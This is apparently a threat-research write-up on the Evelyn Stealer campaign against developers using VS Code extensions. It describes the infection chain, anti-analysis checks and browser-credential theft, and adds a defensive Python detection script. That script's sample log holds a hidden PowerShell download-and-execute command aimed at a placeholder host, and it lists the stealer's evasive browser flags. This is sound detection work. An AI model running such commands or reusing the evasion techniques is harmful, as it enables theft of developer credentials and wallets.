From Extension to Infection - An In-Depth Analysis of the Evelyn Stealer Campaign Targeting Software Developers
Analysis of the Evelyn Stealer campaign targeting software developers shows that threat actors are weaponizing the Visual Studio Code (VSC) extension ecosystem to deploy a multistage, information-stealing malware. The malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data. Compromised developer environments can also be abused as access points into broader organizational systems. This activity affects organizations with software development teams that rely on VSC and third-party extensions, as well as those with access to production systems, cloud resources, or digital assets. On December 8, 2025, Koi.ai published their findings about a campaign specifically targeting software developers through weaponized Visual Studio Code extensions. Evelyn implements multiple anti-analysis techniques to evade detection in research and sandbox environments. It collects system information, harvests browser credentials through DLL injection, and steals files, clipboard contents, and Wi-Fi credentials. It can also capture screenshots and steal cryptocurrency wallets. The malware communicates with its command-and-control (C&C) server over FTP.
Once the malicious VSC extension is installed, its downloader masquerades as a legitimate Lightshot DLL component and is loaded by the genuine Lightshot.exe. Upon loading, the DLL immediately executes its payload. It then launches a hidden PowerShell command that downloads a second-stage payload, stores it in the Local Temp directory as “runtime.exe”, and executes it. The second-stage payload is a process hollowing injector designed to decrypt a third-stage payload and inject it into the legitimate Windows process “grpconv.exe”. The final payload, a copy of Evelyn Stealer, is encrypted with AES-256-CBC; the injector decrypts it using the following AES key and IV: AES Key (32 bytes): 2e649f6145f55988b920ff5a445e63aae29c80495b830e0d8bb4b3fff4b1f6f4 - IV (16 bytes): 5c507b22e9814428c5f2b1ef213c5c4a.
Upon execution of Evelyn Stealer, the malware employs multiple layers of evasion techniques specifically designed to thwart security researchers, automated analysis systems, and sandbox environments. It implements several virtual machine detection methods, debugger detection, and specialized checks for analysis environments such as Remote Desktop Protocol (RDP) sessions and Hyper-V. The anti-VM and anti-sandbox techniques used by the malware are as follows: GPU analysis: detects VMware, VirtualBox, Hyper-V, Parallels, QEMU, VirtIO, and basic display adapters; Hostname analysis: checks the computer name for VM indicators; Disk size analysis: flags systems with less than 60 GB of disk space, which is typical of VMs; Process analysis: scans for VM-related processes (e.g., vmtoolsd.exe, vboxservice.exe); Registry analysis: checks hardware registry keys for VM identifiers, a relatively sophisticated evasion technique against analysis environments.

Once the malware acquires abe_decrypt.dll, it targets browsers through a process creation and DLL injection technique specifically designed to defeat browser security mechanisms. It bypasses many standard protection mechanisms, including sandboxing, extension-based security tools, and user interface (UI) protections. The malware constructs an extensive command line with more than 15 browser flags chosen to minimize detection and forensic traces, including “--headless=new”, “--disable-gpu”, “--no-sandbox”, “--disable-extensions”, “--disable-logging”, “--silent-launch”, “--no-first-run”, “--disable-popup-blocking”, “--window-position=-10000,-10000”, and “--window-size=1,1”.

Additionally, the malware captures desktop screenshots and collects various information from the infected machine, including the following: system information such as username, computer name, OS version, installed software, running processes, sensitive files, VPN configuration, and more; cryptocurrency wallets; clipboard data; Wi-Fi passwords.
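The execution chain above (Lightshot.exe spawning a hidden PowerShell downloader that drops runtime.exe, runtime.exe launching grpconv.exe as the hollowing target, and a browser started with the off-screen headless flag set) gives a defender three process-creation patterns to alert on. The script below is an added example written for this write-up; it is not code from Trend Micro, Koi.ai, or the malware. It parses a constructed pipe-separated process-event format (image|parent|cmdline) that stands in for EDR or Sysmon Event ID 1 records, and the sample events, file paths, and URL are all constructed for illustration.

```python
"""Process-creation detections for the Evelyn Stealer chain (added example).

The record format, sample paths and the example.invalid URL are constructed;
map parse_event() onto your own EDR/Sysmon process-creation schema.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the creating process
    cmdline: str        # command line of the created process


def parse_event(line: str) -> ProcEvent:
    """Parse one constructed 'image|parent|cmdline' record."""
    parts = line.rstrip("\n").split("|", 2)
    if len(parts) != 3:
        raise ValueError(f"unparseable event: {line!r}")
    return ProcEvent(*parts)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_user_writable_dir(path: str) -> bool:
    p = path.lower()
    return "\\temp\\" in p or "\\appdata\\" in p or "\\downloads\\" in p


# Browser switches listed in the write-up; the combination is the signal, not any single flag.
EVASIVE_BROWSER_FLAGS = {
    "--headless=new", "--no-sandbox", "--disable-extensions", "--disable-logging",
    "--silent-launch", "--window-position=-10000,-10000", "--window-size=1,1",
}
BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every stage pattern this event matches."""
    hits: List[str] = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.cmdline.lower()

    # Stage 1: the sideloaded DLL runs inside Lightshot.exe and spawns a hidden PowerShell
    # downloader that writes runtime.exe to %TEMP%.
    if parent == "lightshot.exe" and img in {"powershell.exe", "pwsh.exe"}:
        hidden = "-w hidden" in cmd or "windowstyle hidden" in cmd
        if hidden or "runtime.exe" in cmd:
            hits.append("stage1_lightshot_hidden_powershell")

    # Stage 2: grpconv.exe launched by runtime.exe or by anything living in a user-writable
    # directory is the process hollowing target being prepared.
    if img == "grpconv.exe" and (parent == "runtime.exe" or in_user_writable_dir(ev.parent_image)):
        hits.append("stage2_grpconv_hollowing_target")

    # Stage 3: a browser started headless, unsandboxed, as a 1x1 window parked off screen.
    if img in BROWSERS:
        present = {f for f in EVASIVE_BROWSER_FLAGS if f in cmd}
        if "--headless=new" in present and "--no-sandbox" in present and len(present) >= 4:
            hits.append("stage3_headless_browser_credential_harvest")
    return hits


def scan(log_text: str) -> Dict[str, List[str]]:
    """Return {alert_name: [image paths]} for every event that matches a pattern."""
    alerts: Dict[str, List[str]] = {}
    for line in log_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ev = parse_event(line)
        for name in classify(ev):
            alerts.setdefault(name, []).append(ev.image)
    return alerts


# Constructed sample events: image|parent|cmdline (paths and URL are illustrative only).
SAMPLE_LOG = r"""
# benign launch of the screenshot tool
C:\Users\dev\AppData\Local\Programs\Lightshot\Lightshot.exe|C:\Windows\explorer.exe|Lightshot.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Users\dev\AppData\Local\Programs\Lightshot\Lightshot.exe|powershell.exe -w hidden -c "iwr http://example.invalid/p -OutFile $env:TEMP\runtime.exe; & $env:TEMP\runtime.exe"
C:\Users\dev\AppData\Local\Temp\runtime.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|runtime.exe
C:\Windows\System32\grpconv.exe|C:\Users\dev\AppData\Local\Temp\runtime.exe|grpconv.exe
C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Windows\System32\grpconv.exe|chrome.exe --headless=new --disable-gpu --no-sandbox --disable-extensions --disable-logging --silent-launch --no-first-run --disable-popup-blocking --window-position=-10000,-10000 --window-size=1,1
# ordinary user activity that must not alert
C:\Program Files\Google\Chrome\Application\chrome.exe|C:\Windows\explorer.exe|chrome.exe --profile-directory=Default
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\explorer.exe|powershell.exe -NoProfile
"""

if __name__ == "__main__":
    for name, images in scan(SAMPLE_LOG).items():
        print(f"{name}: {images}")
```

Each rule is deliberately narrow on the parent/child relationship rather than on file names alone, because runtime.exe and grpconv.exe are trivially renamed, whereas the sideloading host, the hollowing target, and the headless browser flag combination are what the chain actually depends on. Tune the browser rule's flag threshold against your own telemetry: test automation frameworks legitimately use --headless=new, but rarely together with --no-sandbox and an off-screen 1x1 window.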
The Evelyn Stealer campaign reflects the operationalization of attacks against developer communities, which are seen as high-value targets given their important role in the software development ecosystem. By embedding itself in VSC extensions and staging its execution through loaders and process hollowing, the campaign treats the developer environment itself as the delivery mechanism. Reinforcing its attack chain with capabilities such as AES-256-CBC payload encryption, multilayered anti-analysis techniques, and apparently disciplined operational security, the campaign shows a level of maturity designed to evade detection while exploiting the implicit trust developers place in their tools. As developers increasingly become prime targets due to their privileged access and cryptocurrency holdings, organizations must implement comprehensive security measures, including extension vetting, behavioral monitoring, and zero-trust architectures specifically designed for development workflows.
To read the complete article see: Trend Micro Research.